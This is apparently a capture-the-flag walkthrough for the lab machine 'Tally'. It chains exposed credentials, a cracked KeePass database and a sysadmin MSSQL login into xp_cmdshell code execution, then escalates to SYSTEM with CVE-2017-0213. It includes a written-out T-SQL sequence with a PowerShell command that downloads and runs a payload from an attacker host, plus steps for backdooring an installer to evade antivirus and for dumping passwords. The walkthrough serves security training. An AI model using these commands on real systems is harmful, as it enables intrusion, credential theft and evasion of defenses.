# Tally

## Tally - 10.10.10.59

### Target Enumeration:

OS: Windows

User: be72362e8dffeca2b42406d5d1c74bb1

Root: 608bb707348105911c8991108e523eda

### Ports / Services / Software Versions Running

21/tcp   open ftp           Microsoft ftpd

80/tcp   open http          Microsoft IIS httpd 10.0

81/tcp   open http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

135/tcp  open msrpc         Microsoft Windows RPC

139/tcp  open netbios-ssn   Microsoft Windows netbios-ssn

445/tcp  open microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

808/tcp  open ccproxy-http?

1433/tcp open  ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM

### Vulnerability Exploited:

FTP password stored in plaintext in an unauthenticated SharePoint document library

SMB credentials stored in a KeePass database protected by a weak master password; MSSQL credentials hard-coded in a binary (tester.exe) on the ACCT share

MSSQL login is sysadmin, so xp\_cmdshell can be re-enabled and used to launch a PowerShell reverse shell

### Privilege Escalation:

CVE-2017-0213: Windows COM Elevation of Privilege Vulnerability

<https://github.com/WindowsExploits/Exploits/blob/master/CVE-2017-0213/Readme.md>

### Exploiting the host:

Nmap:

<div align="left"><img src="https://lh3.googleusercontent.com/97YKx_vEHO_jZvSC8N8A6K0F-8gT1vP8Nh5jR0jUjlqOzDCE54irx1gws1AH9729CfBM1CDvbikIrQAVekR-ngb-dQZjpnBR4_ND3s7uqyVpi9BOircDZl6vpvN7D7hlYFQrVizF" alt=""></div>

Dirb finds a few SharePoint directories.

The SharePoint document library exposes FTP credentials without authentication at:

<http://10.10.10.59/Shared%20Documents/Forms/AllItems.aspx>

![](https://lh4.googleusercontent.com/Zr6By_ogHY_bmlV6qmgkw6dkHNbj9xpNOsBTCh7MYlHG-OM6IVukTp68MybuRtk_I-T73XpnPVVIGe_Av9zW5dpjt0KXr46xtCXUVifXsPL2gKWPIWOMLvwANf3rLToOSdmRhRBq)

Log in to FTP with the user ftp\_user and the password above.

Looking around the FTP file system we find do to.txt in the folder /user/tim/project/log, with the following contents:

<div align="left"><img src="https://lh5.googleusercontent.com/yHu5Xw6k5ue2raW14VajlcYhy6VHcdmf6b92absXwSKL7vgtVwFrwIgxzxxeZcxQ5MvrSku0Fj9QL0VzQU2inwpRiHrmtDkzz_VuDA6p6XPeHuO1jtf3til2QFljQ_YaNQA-b5uB" alt=""></div>

Looking further around the file system we find the KeePass database referenced above in /user/tim/files.

We extract a crackable hash of the master key from the database (keepass2john):

![](https://lh4.googleusercontent.com/S6MEVULmRfd4plIzJQOLa2ybNqZxGyzbhh9gvuFUik1TX8Cna0cdWjRbM51Y0c_2fxDL5dLAX4_1FlRegscSTKK-uwf9Otiscl4oqsk0Q0Lp8yvkO_LAWbS3tkCatGkIF5BT5rHy)

and crack it with john:

![](https://lh4.googleusercontent.com/2WHgNMsTvq1pxy_uN21EZ5s6JDEbqAcCx6e4d6D_MZ8TakoYb1E1bFPr0VlkLzC9ceddbkLzWO42JuSOhWJ0Yr-8hL2RlSbIwfvUJwVHkzknbW8KGIou6UwHY6fCuGgSg6_rGi8-)

Open the database with kpcli using the cracked master password; it contains further credentials:

![](https://lh5.googleusercontent.com/-Ic-CiWUUce-bv0Bnonl047CDPTNaS9BiHrrqgZBuTQgoDnfo33EqO82019K-sC9P8A4DUzP_bRgi5Uc9vTzloauJhU2YIjcKz3kDdmxkrMiAGDy5b53vZ3wWtHh61HGdDdCiJR6)

Log in to Tally over SMB with those credentials and enumerate the ACCT share for information.

The migration folder looks the most promising, given the clue in the to-do file above.

Running strings on tester.exe reveals a hard-coded SQL connection string, including the password:

![](https://lh4.googleusercontent.com/YbwfrOu38cHzFlhJMNCe4VM6n-5J8pwfLytd5z7r0Ndu5Fp5eW3a72Xh9wdIhF9139ps670I-lmOPeFa8QfEwbI7rzblaCFS8NIC-m7O__3sIaVXMlM5E0a_6yoVtjPkpjTrowV_)

Now log in to the SQL server with those credentials using sqsh:

![](https://lh5.googleusercontent.com/Qmfbmhy7JlAvH5U7FhTWLz3znINZOZ5o9TWVN3ZqUrhe0uV-jRaYwnTA0QfYFLdaKh596NEuS8cVpCT4E13WkSW_91yumvTVVmG6YVDKJESgIPdtyppgIq1-xRlj4aB3gAHCX67r)

Reconfigure the server to enable xp\_cmdshell so we can run system commands:

![](https://lh4.googleusercontent.com/O6Er0l2lM_QAUrX7ulRZSfLqkVaRjmSiWOnoWNkozw44T0rWuGQdM30D5f22vhMOiTaB1wTDUhE1WZu3b78bvP9ZOz5atQFGHpQchDQhwY9Rn6BLnBzOR7BdMZKmkI5XNgTzwXg9)

Windows Defender runs on the target and catches most stock reverse shells, so generate the PowerShell payload with setoolkit instead:

![](https://lh5.googleusercontent.com/PukDb_SSiSGda7C8YajLunYX1hKVRIA3GXBwZD_bkgEcux2vyWgmkJyp-xNUbcjMcjW2pGk-gpxUAIYfTphWjdx2cTix5vtp0kFcEl8aURa4A3S2_vfrVSbIIMLT7dLw_1WKCPJ0)

Save the payload as Shell2.ps1, host it with Python's HTTP server, and start your Metasploit listener.

Download and execute it through xp\_cmdshell:

![](https://lh6.googleusercontent.com/YRYp_DRYAkk32zn6cp-T_1ER63yqdobPaGyOoRCWEm0hOTC5MJxh9gOnxMGN659a_taEPp_sSweFv1jZKIN1Qg-EFCsHen1Kr3WWM5cvTL-lVYzKCRpWrABDXaMVgQhYv74cTBCE)
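The xp\_cmdshell steps above, written out as one T-SQL sequence you can paste into sqsh. This is an added worked example, not a transcript from the original page. It first confirms the login really is a sysadmin (sp\_configure needs the ALTER SETTINGS permission, which sysadmin holds, so a non-sysadmin login fails at step 3 rather than at the shell), enables the procedure, and then runs the PowerShell download cradle. The attacker IP 10.10.14.5 is an assumption; Shell2.ps1 is the payload name used above.

```sql
-- Added example (not from the original page): enabling xp_cmdshell from a
-- sysadmin MSSQL login and using it to fetch and run the hosted payload.

-- 1. Confirm the login can change server configuration. sp_configure requires
--    ALTER SETTINGS, which the sysadmin role holds; without it steps 3-5 fail.
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin,   -- 1 means yes
       SYSTEM_USER                   AS login_name;

-- 2. Check whether xp_cmdshell is already on (value_in_use = 1). Defenders can
--    run this same query to audit the setting.
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name IN ('show advanced options', 'xp_cmdshell');

-- 3. xp_cmdshell is an "advanced option", so expose those first, then enable
--    it. RECONFIGURE applies each change immediately; no service restart.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 4. Sanity check: commands run as the SQL Server service account, which is
--    the user you land as (not the SQL login you authenticated with).
EXEC xp_cmdshell 'whoami';

-- 5. Download cradle for Shell2.ps1. The attacker IP 10.10.14.5 is an
--    assumption; the file is served from the directory holding the payload by
--    a Python HTTP server on port 80. Doubled single quotes are T-SQL escaping
--    for the quotes inside the PowerShell string.
EXEC xp_cmdshell 'powershell -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString(''http://10.10.14.5/Shell2.ps1'')"';

-- 6. Optional: put the configuration back once the reverse shell is up, so the
--    only trace left in sys.configurations is the audit trail, not an open door.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Step 5 blocks the sqsh session for as long as the PowerShell process lives, which is expected because the reverse shell holds that process; open a second sqsh session if you still need SQL access alongside the shell.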

Now you have a shell:

![](https://lh4.googleusercontent.com/CIAzPsX_BFW_s9w0asGfLQo918qWnNBEAJu3ddeKg7rh0XKULjnron6F08sKZqtr13N_c4XHNG-SPyKCzjgYZmSQXEOPTZnl_8lCDw56G2gHiabqDEewjKMB1Fhap9ZdI_onk7VM)

There is a hint that the installed patches are not up to date:

![](https://lh4.googleusercontent.com/EtyQaCiOTXnpL0McV1cce-9DtGdiV_jfJdxEW2jomUrgslzNDsihvFcgPcrWOmDcPG-C0AXlYNeIrJFxOtx7o4uX0hYfEzki1S5NEs3TXjKPjFyNOgGhT1nRqzRHeFj8SJUgQhJA)

Looks like the machine has been locked down and has Windows Defender installed.

![](https://lh3.googleusercontent.com/4Aa57asGnf8zG6VtXFg26aoDUKmG_9LPI8zkny9L05e7c5kgkLDkvOuTsx59l30tgWP2bWfLWohZsc2zLlDTdz8-kz61xB7sv8oSAklKwLCQeAncbpSay68zVnIWqrlUQbJyXoDW)

Download the 32-bit WinRAR installer and backdoor it with a reverse shell using Shellter:

Upload it to the target and check that it gets past Windows Defender. Once it runs, open a few more shells in case the current one dies. We will also need this binary for root.

Running systeminfo shows only two hotfixes installed. After trying numerous exploits against the host, the following one works:

<https://www.exploit-db.com/raw/42020/>

![](https://lh4.googleusercontent.com/PRAGkBGYZmsIpaNHEDqVAlJZJXdMonthcJEL1S7LdS2nL0Po9sqgDdnh6Or9jEX1Mot3_9LAWA47Of-nvjwPYZM6NFdIfCSqV76OzLSkLmD87wozc2hG8cf6MlOB4DNIzw-f8PP-)

Download the compiled exploit from:

<https://github.com/WindowsExploits/Exploits/blob/master/CVE-2017-0213/Readme.md>

Migrate your Meterpreter session to explorer.exe.

Upload the exploit to the target, and place a copy of the Shellter-backdoored binary beside it renamed to cmd.exe: when the exploit spawns cmd.exe with SYSTEM privileges, it launches our reverse shell instead.

Run the exploit.

Now you will have a SYSTEM shell:

![](https://lh6.googleusercontent.com/8AaJcPddqGnS1-oZPPWMmXHM0EuXm5T7XrLIAp1sc4iuhX2W-apgZLQ1Kkn6T7HI34zK3amQx6QP0ctr9-NJE31pdYNj_m5pLXksddRIqRRHBe20glkEdU6yFpCxSzz4QZeVySHj)

System Shell:

![](https://lh6.googleusercontent.com/VAip9aQQARWQ-83rNDUbKzl5ZCOTML0hz813n8-JR_Z8S7ppV00lVPRQOxRSbAvzVw0HGc2j0MOuvioWoMkrJOqOBA59iXaosUxT3sVkSAf-prmYhl3cXLmAHU0s7g0ThrEk9Ip0)

Now capture your flag:

![](https://lh3.googleusercontent.com/NPa2Qno_TLHLLUUGQsJfmTbbgqBDVVGIEvDU7oqaHFB2i1EUW_YHrWySQOl-jiy20cm5pM6jkwPoV5DaxXJehz5PIwybBlBqSE6l4jx5l-lhkunX3ysQmj2f4TFK7vWTZVR4TQgM)

Dump the plaintext passwords from memory:

![](https://lh3.googleusercontent.com/NzUQ7QluyiWXZ5UOIJgNYaROxEInOzGDmRy3p7Qrzdp2LBLWkDpHN7lTlLALhmWguGdPsRHDVc1IL3IEzYkg_lb2KRvbzQohgWreT-LUwHnWz0odbmh3nI26pLlJmNhE1VyF54Eh)

